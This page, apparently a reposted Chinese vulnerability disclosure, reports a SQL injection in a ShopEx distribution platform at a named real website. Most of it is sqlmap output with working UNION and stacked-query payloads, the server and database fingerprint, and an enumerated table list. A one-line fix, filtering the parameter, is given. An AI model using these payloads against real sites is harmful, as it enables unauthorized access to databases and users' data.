网站地图    收藏   

主页 > 后端 > 网站安全 >

ShopEx分销平台sql注入漏洞导致用户信息泄露 - 网

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 注入点:http: www fengxiaowang cn:80 article php?aa_id=* (GET)sqlmap identified the following injection points with a total of 184 HTTP(s) requests:---Place: URIParameter: 1*...






注入点:
 
http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET)
 
sqlmap identified the following injection points with a total of 184 HTTP(s) requests:

---

Place: URI

Parameter: #1*

    Type: UNION query

    Title: MySQL UNION query (NULL) - 7 columns

    Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL#



    Type: stacked queries

    Title: MySQL > 5.0.11 stacked queries

    Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)-- 

---

web application technology: Nginx, PHP 5.2.13

back-end DBMS: MySQL 5.0.11

web application technology: Nginx, PHP 5.2.13

back-end DBMS: MySQL 5.0.11

Database: b2b_fenxiaowang

[9 tables]

+------------------+

| category         |

| data             |

| photo            |

| photo_extend     |

| product_active   |

| products         |

| products_content |

| products_extend  |

| webnews          |

+------------------+

 

 
修复方案:
问题参数过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论